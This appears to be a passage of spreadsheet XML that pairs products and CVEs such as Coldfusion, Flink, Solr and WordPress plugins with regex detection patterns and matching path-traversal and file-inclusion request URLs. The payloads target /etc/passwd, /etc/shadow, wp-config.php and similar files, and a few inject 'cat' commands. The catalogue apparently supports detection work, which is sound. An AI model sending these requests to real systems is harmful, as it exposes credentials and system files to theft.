../../../../../../../../etc/passwd|../../../../../../../../../etc/passwd|%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%|../../../../../../../../../../../../etc/passwd%00|../../../../../../etc/passwd\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow|../../../../etc/passwd\\/../../../../../../../../../etc/shadow|..;/../../../../../../../../etc/passwd\\/../../../../../../../../../../etc/passwd%00.jpg|..;/../../../etc/passwd\\/../../../../../../../../../etc/shadow^^|%0a/bin/cat%20/etc/passwd\\././././././././././etc/shadow|cat+ ../../../../../../../etc/passwd\\%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd|..;/../../../../../etc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd|cat+ ../../../../../../etc/passwd|cat+ ../../../../../../../../../etc/passwd\\/../../../../../../../../../etc/passwd|%00../../../../../../etc/passwd\\././././././././././etc/passwd|cat ../../../../../../../../../etc/passwd|../../../../../../../etc/passwd|whoami\\/../../../../../../../../../../etc/passwd%00.html</t>
  </si>
  <si>
    <t>Fhem</t>
  </si>
  <si>
    <t>Fhem_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/fhem/FileLog_logWrapper\?dev=Logfile\&amp;file=%2fetc%2fpasswd\&amp;type=text).*</t>
  </si>
  <si>
    <t>/fhem/FileLog_logWrapper?dev=Logfile&amp;file=%2fetc%2fpasswd&amp;type=text</t>
  </si>
  <si>
    <t>Glpi</t>
  </si>
  <si>
    <t>Glpi_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/ajax/kanban\.php\?action=add_item\&amp;itemtype=Plugin).*</t>
  </si>
  <si>
    <t>/ajax/kanban.php?action=add_item&amp;itemtype=Plugin</t>
  </si>
  <si>
    <t>Jeewms</t>
  </si>
  <si>
    <t>Jeewms_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/systemController/showOrDownByurl\.do\?down=\&amp;dbPath=\.\./Windows/win\.ini|/systemController/showOrDownByurl\.do\?down=\&amp;dbPath=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/systemController/showOrDownByurl.do?down=&amp;dbPath=../Windows/win.ini|/systemController/showOrDownByurl.do?down=&amp;dbPath=../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>米拓_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/include/thumb\.php\?dir=http\\\.\.\\admin\\login\\login_check\.php).*</t>
  </si>
  <si>
    <t>/include/thumb.php?dir=http\..\admin\login\login_check.php</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?index=a\&amp;skin=\&amp;dataoptimize_html=/\.\./\.\./\.\./robots\.txt).*</t>
  </si>
  <si>
    <t>/index.php?index=a&amp;skin=&amp;dataoptimize_html=/../../../robots.txt</t>
  </si>
  <si>
    <t>Shopxo</t>
  </si>
  <si>
    <t>Shopxo_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/public/index\.php\?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=).*</t>
  </si>
  <si>
    <t>/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=</t>
  </si>
  <si>
    <t>Squirrelmail_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/src/read_body\.php\?mailbox=/etc/passwd\&amp;passed_id=1\&amp;|/src/download\.php\?absolute_dl=true\&amp;passed_id=1\&amp;passed_ent_id=1\&amp;mailbox=/etc/passwd).*</t>
  </si>
  <si>
    <t>/src/read_body.php?mailbox=/etc/passwd&amp;passed_id=1&amp;|/src/download.php?absolute_dl=true&amp;passed_id=1&amp;passed_ent_id=1&amp;mailbox=/etc/passwd</t>
  </si>
  <si>
    <t>Vmware_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/eam/vib\?id=/etc/issue).*</t>
  </si>
  <si>
    <t>/eam/vib?id=/etc/issue</t>
  </si>
  <si>
    <t>Wordpress_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/\?mdocs\-img\-preview=\.\./\.\./\.\./wp\-config\.php).*</t>
  </si>
  <si>
    <t>/?mdocs-img-preview=../../../wp-config.php</t>
  </si>
  <si>
    <t xml:space="preserve">Apache Solr </t>
  </si>
  <si>
    <t>Apache Solr_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/solr/admin/cores\?wt=json|/solr/\{\{core\}\}/debug/dump\?stream\.url=file:///etc/passwd\&amp;param=ContentStream).*</t>
  </si>
  <si>
    <t>/solr/admin/cores?wt=json|/solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&amp;param=ContentStream</t>
  </si>
  <si>
    <t>CMSimple</t>
  </si>
  <si>
    <t>CMSimple_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?sl=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?sl=../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>cve_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Coldfusion系统</t>
  </si>
  <si>
    <t>CVE-2010-2861</t>
  </si>
  <si>
    <t>Coldfusion系统_任意文件包含_CVE-2010-2861</t>
  </si>
  <si>
    <t>.*?(?:/CFIDE/administrator/enter\.cfm\?locale=\.\./\.\./\.\./\.\./\.\./\.\./\.\./lib/password\.properties%00en).*</t>
  </si>
  <si>
    <t>/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en</t>
  </si>
  <si>
    <t>Cs</t>
  </si>
  <si>
    <t>Cs_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/classes/phpmailer/class\.cs_phpmailer\.php\?classes_dir=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>织梦_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/plus/carbuyaction\.php\?dopost=return\&amp;code=\.\./\.\./).*</t>
  </si>
  <si>
    <t>/plus/carbuyaction.php?dopost=return&amp;code=../../</t>
  </si>
  <si>
    <t>Dicoogle Pacs</t>
  </si>
  <si>
    <t>Dicoogle Pacs_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/exportFile\?UID=\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cwindows%5cwin\.ini).*</t>
  </si>
  <si>
    <t>/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini</t>
  </si>
  <si>
    <t>Dss DownlOAd</t>
  </si>
  <si>
    <t>Dss DownlOAd_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/portal/attachment_downloadByUrlAtt\.action\?filePath=file:///etc/passwd).*</t>
  </si>
  <si>
    <t>/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd</t>
  </si>
  <si>
    <t>Ecsimaging Pacs</t>
  </si>
  <si>
    <t>Ecsimaging Pacs_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/showfile\.php\?file=/etc/passwd).*</t>
  </si>
  <si>
    <t>/showfile.php?file=/etc/passwd</t>
  </si>
  <si>
    <t>Edusoho</t>
  </si>
  <si>
    <t>Edusoho_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/export/classroom\-course\-statistics\?fileNames\[\]=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Fastbee</t>
  </si>
  <si>
    <t>Fastbee_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/prod\-api/iot/tool/download\?fileName=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Flink Jobmanager系统</t>
  </si>
  <si>
    <t>CVE-2020-17519</t>
  </si>
  <si>
    <t>Flink Jobmanager系统_任意文件包含_CVE-2020-17519</t>
  </si>
  <si>
    <t>.*?(?:/jobmanager/logs/\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252fetc%252fpasswd).*</t>
  </si>
  <si>
    <t>/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd</t>
  </si>
  <si>
    <t>Generic Linux</t>
  </si>
  <si>
    <t>Generic Linux_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/shells\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/shells|/index\.php\?page=\.\./\.\./etc/shells|/static/\.\.%5c\.\.%5cetc/shells|/index\.php\?page=etc/shells|/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/shells\\\\%5c\.\.%5cetc/shells|/static/\.\.%5c\.\.%5c\.\.%5cetc/shells|/index\.php\?page=\.\.\.\.//\.\.\.\.//etc/shells|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/shells|/etc/shells\\\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shells\\\\%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc/shells\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/shells\\\\%5cetc/shells\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shells|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/shells|/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/shells|/static/\.\.%5cetc/shells\\\\0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5cetc/shells|/index\.php\?page=etc/shells%00|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/shells|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/shells|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/shells\\\\5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./etc/shells\\\\///////\.\.////\.\.//////etc/shells|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells\\\\252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/etc/shells\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/shells\\\\%5c\.\.%5c\.\.%5cetc/shells|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells%00\\%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd|/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd|/static/\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./etc/passwd|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\\\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/static/\.\.%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/etc/passwd\\\\0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/etc/passwd\\\\%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\%5c\.\.%5cetc/passwd|/index\.php\?page=\.\./\.\./etc/passwd\\\\///////\.\.////\.\.//////etc/passwd|/index\.php\?page=\.\.\.\.//\.\.\.\.//etc/passwd\\\\5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./etc/passwd|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd|/index\.php\?page=etc/passwd|/index\.php\?page=etc/passwd%00|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\\\\0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5cetc/passwd|/static/\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/etc/passwd|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/passwd|/static/\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5cetc/passwd|/etc/passwd\\\\%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./etc/passwd|/etc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd|/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/etc/passwd\\\\%5c\.\.%5c\.\.%5cetc/passwd\\\\0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5cetc/passwd|/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd\\\\%5cetc/passwd\\\\%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5c\.\.0x5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./\.%5C%5C\./etc/passwd|/etc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%5c\.\.%5cetc/passwd\\\\252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/etc/passwd).*</t>
  </si>
  <si>
    <t>/..%5c..%5c..%5c..%5c..%5cetc/shells\\%5c..%5c..%5c..%5c..%5c..%5cetc/shells|/index.php?page=../../etc/shells|/static/..%5c..%5cetc/shells|/index.php?page=etc/shells|/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/shells\\%5c..%5cetc/shells|/static/..%5c..%5c..%5cetc/shells|/index.php?page=....//....//etc/shells|/static/..%5c..%5c..%5c..%5c..%5cetc/shells|/etc/shells\\../../../../../../../../../../etc/shells\\%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shells\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells\\%5cetc/shells\\/../../../../../../../../etc/shells|/static/..%5c..%5c..%5c..%5cetc/shells|/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/shells|/static/..%5cetc/shells\\0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/shells|/index.php?page=etc/shells%00|/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/shells|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells|/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells|/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/shells\\5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/shells\\///////..////..//////etc/shells|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells\\252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/shells\\%5c..%5c..%5c..%5cetc/shells\\%5c..%5c..%5cetc/shells|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells%00\%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd|/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd|/static/..%5cetc/passwd\\%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\\../../../../../../../../../../etc/passwd|/static/..%5c..%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5cetc/passwd|/etc/passwd\\0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd|/static/..%5c..%5c..%5c..%5c..%5cetc/passwd\\252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd\\%5c..%5cetc/passwd\\%5c..%5c..%5c..%5cetc/passwd|/static/..%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\../../../../../../../../../../etc/passwd\\%5c..%5cetc/passwd|/index.php?page=../../etc/passwd\\///////..////..//////etc/passwd|/index.php?page=....//....//etc/passwd\\5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd|/index.php?page=etc/passwd|/index.php?page=etc/passwd%00|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5cetc/passwd\\/../../../../../../../../etc/passwd\\%5c..%5c..%5c..%5cetc/passwd|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\\0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd|/static/..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5cetc/passwd\\252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd|/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd|/static/..%5c..%5cetc/passwd\\%5c..%5c..%5cetc/passwd|/etc/passwd\\%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd|/etc/passwd\\%5c..%5c..%5c..%5c..%5cetc/passwd|/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd|/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd\\%5c..%5c..%5cetc/passwd\\0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd|/static/..%5c..%5c..%5c..%5cetc/passwd\\../../../../../../../../../../etc/passwd\\%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/static/..%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5cetc/passwd\\%5cetc/passwd|/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd\\%5c..%5c..%5c..%5cetc/passwd\\%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\../../../../../../../../../../etc/passwd|/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd\\%5cetc/passwd\\%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\\%5c..%5c..%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5cetc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd|/static/..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\\5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd|/etc/passwd|/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/static/..%5c..%5cetc/passwd\\%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd|/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd\\%5c..%5c..%5c..%5c..%5cetc/passwd\\%5c..%5cetc/passwd\\252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd</t>
  </si>
  <si>
    <t>Glassfish系统</t>
  </si>
  <si>
    <t>Glassfish系统_任意文件包含_CVE-2017-1000028</t>
  </si>
  <si>
    <t>.*?(?:/theme/META\-INF/%c0%ae%c0%ae/META\-INF/MANIFEST\.MF).*</t>
  </si>
  <si>
    <t>/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF</t>
  </si>
  <si>
    <t>Goip</t>
  </si>
  <si>
    <t>Goip_任意文件包含</t>
  </si>
  <si>
    <t>.*?(?:/default/en_US/frame\.A100\.html\?sidebar=\.\.%2f\.\.%2f\ \.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd|/default/en_US/frame\.html\?content=\.\.%2f\.\.%2f\.\.%2f\ \.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd|/default/en_US/frame\.A100\.html\?sidebar=\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd|/default/en_US/frame\.html\?content=\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd).*</t>
  </si>
  <si>
